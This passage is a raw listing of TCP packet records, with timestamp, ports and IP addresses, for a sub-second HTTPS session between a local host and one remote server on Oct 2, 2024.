Oct 2, 2024 04:27:27.079447031 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079451084 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079487085 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079526901 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079570055 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079693079 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079736948 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079739094 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079754114 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079793930 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079801083 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079844952 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079869986 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079911947 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079915047 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079922915 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079956055 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080039978 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080085993 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080092907 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080137968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080158949 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080202103 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080203056 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080213070 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080249071 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080338955 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080382109 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080389023 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080393076 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080424070 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080552101 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080594063 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080606937 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080653906 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080655098 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080662966 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080696106 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080705881 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080748081 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080755949 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080760002 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080791950 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080903053 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080944061 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.080950022 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.080996037 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.081013918 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081053972 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081060886 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.081067085 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081104040 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.081141949 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081202984 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.081204891 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081213951 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081244946 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.081253052 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081264019 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.081267118 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.081300020 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.116002083 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.166466951 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.166558981 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.166591883 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.166644096 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.166706085 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.166760921 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.166826010 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.166887999 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.166951895 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167016029 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167069912 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167129993 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167165041 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167221069 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167296886 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167355061 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167465925 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167530060 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167582035 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167639971 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167675018 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167728901 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167788029 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167855024 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167896986 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.167951107 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.167995930 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168054104 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168109894 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168163061 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168222904 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168279886 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168315887 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168370008 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168425083 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168481112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168531895 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168596029 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168644905 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168703079 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168737888 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168792963 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168831110 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168883085 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.168920040 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.168973923 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169012070 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169070005 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169106007 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169166088 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169198036 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169254065 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169294119 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169349909 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169385910 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169445992 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169477940 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169534922 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169568062 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169631004 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169656038 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169715881 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.169742107 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.169797897 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.253920078 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.253978968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.253983974 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.253995895 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254028082 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254050970 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254050970 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254062891 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254103899 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254153013 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254206896 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254286051 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254345894 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254348993 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254359007 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254398108 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254403114 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254414082 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254451990 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254580021 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254621029 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254628897 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254635096 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254662991 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254669905 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254683018 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254686117 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254704952 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254712105 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254723072 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254725933 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254748106 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254755974 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254760981 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254813910 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254852057 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254894018 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254910946 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254914999 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.254940033 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.254950047 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255007029 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255048990 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255059004 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255062103 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255096912 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255108118 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255152941 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255204916 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255232096 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255276918 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255285978 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255289078 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255327940 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255407095 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255444050 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255459070 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255462885 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255491018 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255502939 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255595922 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255640030 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255645990 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255649090 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255682945 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255685091 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255692959 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255733013 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255748034 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255800009 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.255932093 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.255989075 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.256015062 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.256067991 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.256175995 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.256232023 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.256285906 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.256342888 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.256398916 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.256457090 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.256494045 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.256551027 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.256593943 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.256652117 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.341677904 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.341753006 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.341898918 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.341960907 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.341963053 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.341974974 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342006922 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342015982 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342020988 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342075109 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342111111 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342202902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342231035 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342308044 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342334032 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342360973 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342391014 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342396975 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342415094 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342448950 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342464924 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342510939 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342521906 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342528105 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342559099 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342576981 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342591047 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342644930 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342650890 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342744112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342777967 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342833996 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342852116 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342900038 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342909098 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342911959 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342940092 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342955112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342958927 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.342986107 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.342997074 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343024015 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343076944 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343096018 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343152046 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343276978 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343322992 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343327999 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343337059 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343374014 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343379974 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343434095 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343437910 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343446970 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343497038 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343502045 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343667984 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343667984 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343677998 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343718052 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343734980 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343782902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343785048 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343795061 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343836069 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343837976 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343848944 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343887091 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343894005 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343904972 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343909025 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343944073 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343952894 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343956947 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343982935 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.343991995 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.343996048 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.344038010 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.344118118 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.344178915 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.429078102 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.429136038 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.639399052 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.641654968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.702204943 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.702220917 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702255011 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702330112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.702334881 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702348948 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702426910 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.702449083 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702481985 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702512980 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702538013 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.702543974 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702594995 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.702642918 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.702646971 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.702696085 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776168108 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776185036 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776201010 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776204109 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776422024 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776427984 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776437998 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776459932 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776465893 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776469946 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776596069 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776601076 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776612997 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776645899 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776648998 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776654959 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776756048 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776760101 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776808977 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776813984 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.776885033 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.776915073 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.987405062 CEST	443	49738	39.103.20.76	192.168.2.4
